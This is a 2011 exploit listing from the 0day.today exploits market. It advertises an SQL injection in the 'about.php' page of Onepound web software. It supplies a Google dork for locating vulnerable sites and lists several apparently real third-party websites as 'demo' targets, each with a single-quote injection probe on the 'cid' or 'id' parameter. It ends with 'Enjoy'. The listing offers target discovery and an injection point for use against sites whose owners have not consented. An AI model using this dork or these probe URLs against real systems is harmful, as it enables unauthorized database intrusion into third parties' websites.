[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Onepound(about.php) sql injection Vulnerability

Author
Angel Injection
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16535
Category
web applications
Date add
18-07-2011
Platform
php
# Exploit Title:Onepound(about.php) sql injection Vulnerability
# Date: 18/7/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link: www.onepound.cn
# Version: N/A
# Category:: webapps
# Google dork:intitle:intext:"Powered by Onepound." inurl:about.php?cid=
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
demo site
http://wzhefeng.com/about.php?id=9%27
http://www.hnsinyoung.com/about.php?cid=6%27
http://www.hnsinyoung.com/about.php?cid=6%27
http://www.shallwee.com/about.php?cid=6%27
http://www.goldxinxing.com/about.php?cid=6%27
http://www.solidbamboo.cn/about.php?cid=6%27

Exploit
http://www.solidbamboo.cn/about.php?cid=6 injection here

Enjoy ^_~
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team



#  0day.today [2024-11-16]  #